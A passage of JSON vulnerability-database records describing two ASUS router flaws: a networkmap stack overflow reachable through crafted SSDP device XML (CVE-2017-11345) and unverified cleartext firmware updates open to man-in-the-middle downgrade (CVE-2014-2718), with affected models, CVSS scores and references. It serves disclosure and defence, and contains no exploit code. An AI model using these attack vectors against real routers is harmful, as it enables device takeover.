merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12hp", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-ac53", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt ac1200gu", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.5577" }, { "model": "rt n12\\+ pro", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac1200", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-n16", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNNVD", "id": "CNNVD-201707-767" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005984" } ] }, "cve": "CVE-2017-11345", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-11345", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2017-35394", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-101758", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-11345", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-11345", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-11345", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-35394", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201707-767", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-101758", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNNVD", "id": "CNNVD-201707-767" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products", "sources": [ { "db": "NVD", "id": "CVE-2017-11345" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-11345", "trust": 3.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2017/07/14/3", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2017-005984", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201707-767", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2017-35394", "trust": 0.6 }, { "db": "SEEBUG", "id": "SSVID-97016", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-101758", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNNVD", "id": "CNNVD-201707-767" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "id": "VAR-201707-0400", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" } ], "trust": 1.342782942 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" } ] }, "last_update_date": "2024-11-23T22:56:11.468000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://asuswrt.lostrealm.ca/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005984" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-101758" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://www.openwall.com/lists/oss-security/2017/07/14/3" }, { "trust": 1.1, "url": "https://asuswrt.lostrealm.ca/changelog" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11345" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11345" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNNVD", "id": "CNNVD-201707-767" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2017-35394" }, { "db": "VULHUB", "id": "VHN-101758" }, { "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "db": "CNNVD", "id": "CNNVD-201707-767" }, { "db": "NVD", "id": "CVE-2017-11345" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-29T00:00:00", "db": "CNVD", "id": "CNVD-2017-35394" }, { "date": "2017-07-17T00:00:00", "db": "VULHUB", "id": "VHN-101758" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "date": "2017-07-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-767" }, { "date": "2017-07-17T13:18:20.953000", "db": "NVD", "id": "CVE-2017-11345" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-11-29T00:00:00", "db": "CNVD", "id": "CNVD-2017-35394" }, { "date": "2017-12-20T00:00:00", "db": "VULHUB", "id": "VHN-101758" }, { "date": "2017-08-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-005984" }, { "date": "2017-09-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201707-767" }, { "date": "2024-11-21T03:07:36.677000", "db": "NVD", "id": "CVE-2017-11345" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-767" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map stack buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-005984" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201707-767" } ], "trust": 0.6 } }
var-201411-0483
Vulnerability from variot
ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a file from http://dlcdnet.asus.com, parses it to determine the latest firmware version, then downloads (again in the clear) a binary file matching that version number from the same web site. No HTTP = no assurance that the site on the other end is the legitimate ASUS web site, and no assurance that the firmware file and version lookup table have not been modified in transit.
In the link below I describe the issue in detail, and demonstrate a proof of concept through which I successfully caused an RT-AC66R to "upgrade" to an older firmware with known vulnerabilities. In concept it should also be possible to deliver a fully custom malicious firmware in the same manner.
This applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the RT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base but a different sub-version.
This has been fixed as an undocumented feature of the 376 firmware branch (3.0.0.4.376.x).
Details and POC: http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html
-- Regards, David Longenecker @dnlongen
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201411-0483", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tm-ac1900", "scope": "eq", "trust": 1.6, "vendor": "t mobile", "version": "3.0.0.4.376_3169" }, { "model": "rt series", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374.x" }, { "model": "rt", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.376.x" }, { "model": "rt-series wireless routers", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n66r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n56u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n56r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n53", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n16r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n16", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-n14u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac66r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac56u", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" }, { "model": "rt-ac56r", "scope": "eq", "trust": 0.3, "vendor": "asus", "version": "0" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "BID", "id": "70791" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-005239" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "David Longenecker", "sources": [ { "db": "BID", "id": "70791" }, { "db": "PACKETSTORM", "id": "128904" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" } ], "trust": 1.0 }, "cve": "CVE-2014-2718", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-2718", "impactScore": 6.9, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-07699", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 7.1, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-70657", "impactScore": 6.9, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:C/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2718", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-2718", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2014-07699", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201410-1415", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-70657", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "VULHUB", "id": "VHN-70657" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a\nfile from http://dlcdnet.asus.com, parses it to determine the latest\nfirmware version, then downloads (again in the clear) a binary file\nmatching that version number from the same web site. No HTTP = no assurance\nthat the site on the other end is the legitimate ASUS web site, and no\nassurance that the firmware file and version lookup table have not been\nmodified in transit. \n\nIn the link below I describe the issue in detail, and demonstrate a proof\nof concept through which I successfully caused an RT-AC66R to \"upgrade\" to\nan older firmware with known vulnerabilities. In concept it should also be\npossible to deliver a fully custom malicious firmware in the same manner. \n\nThis applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R,\nRT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the\nRT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base\nbut a different sub-version. \n\nThis has been fixed as an undocumented feature of the 376 firmware branch\n(3.0.0.4.376.x). \n\nDetails and POC:\nhttp://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html\n\n-- \nRegards,\nDavid Longenecker\n@dnlongen\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2014-2718" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "BID", "id": "70791" }, { "db": "VULHUB", "id": "VHN-70657" }, { "db": "PACKETSTORM", "id": "128904" } ], "trust": 2.61 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-70657", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-70657" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-2718", "trust": 3.5 }, { "db": "BID", "id": "70791", "trust": 2.6 }, { "db": "PACKETSTORM", "id": "128904", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2014-005239", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201410-1415", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2014-07699", "trust": 0.6 }, { "db": "XF", "id": "98316", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-70657", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "VULHUB", "id": "VHN-70657" }, { "db": "BID", "id": "70791" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "PACKETSTORM", "id": "128904" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" }, { "db": "NVD", "id": "CVE-2014-2718" } ] }, "id": "VAR-201411-0483", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "VULHUB", "id": "VHN-70657" } ], "trust": 1.3441403886666667 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" } ] }, "last_update_date": "2024-11-23T22:52:49.688000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.asus.com/jp/" }, { "title": "Cellspot router firmware update information", "trust": 0.8, "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "title": "ASUS RT Series Wireless Routers patch for middleman security bypass vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/51508" }, { "title": "FW_RT_AC68U_30043763715", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54536" }, { "title": "FW_RT_AC68U_30043763626", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54537" }, { "title": "FW_RT_AC68U_30043761663", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=54538" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-07699" }, { "db": "JVNDB", "id": "JVNDB-2014-005239" }, { "db": "CNNVD", "id": "CNNVD-201410-1415" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-345", "trust": 1.1 }, { 